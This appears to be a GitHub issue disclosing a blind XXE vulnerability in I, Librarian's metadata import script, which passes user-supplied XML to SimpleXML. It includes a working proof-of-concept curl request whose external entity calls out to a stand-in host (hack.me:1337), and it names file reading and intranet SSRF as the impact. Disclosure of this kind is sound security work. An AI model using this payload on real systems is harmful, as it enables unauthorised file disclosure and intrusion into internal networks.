if (!$xml = @simplexml_load_string($_POST['form_import_textarea'])) {
$_FILES['form_import_file']['tmp_name'] passes into simplexml_load_file() , $_POST['form_import_textarea'] passes into simplexml_load_string().
This creates a Blind XXE vulnerability.
By XXE, an attacker can read the contents of a file on the target host and attack other hosts on the intranet(SSRF).
POC:
[sn00py.B0x] ➤ curl --request POST 'http://127.0.0.1/librarian/importmetadata.php' --cookie "PHPSESSID=fvp5dermov0tv3fqtdblc7c677" --data "form_sent=1&file_type=endnote&form_import_file=1" --data-urlencode 'form_import_textarea=<?xml version="1.0"?><!DOCTYPE root [<!ENTITY entity SYSTEM "http://hack.me:1337/xxe_test">]><root>&entity;</root>'
Done. Total items recorded: 0
i-librarian/importmetadata.php
Line 139 in 9535753
i-librarian/importmetadata.php
Line 153 in 9535753
$_FILES['form_import_file']['tmp_name']passes into simplexml_load_file() ,$_POST['form_import_textarea']passes into simplexml_load_string().This creates a Blind XXE vulnerability.
By XXE, an attacker can read the contents of a file on the target host and attack other hosts on the intranet(SSRF).
POC:
The text was updated successfully, but these errors were encountered: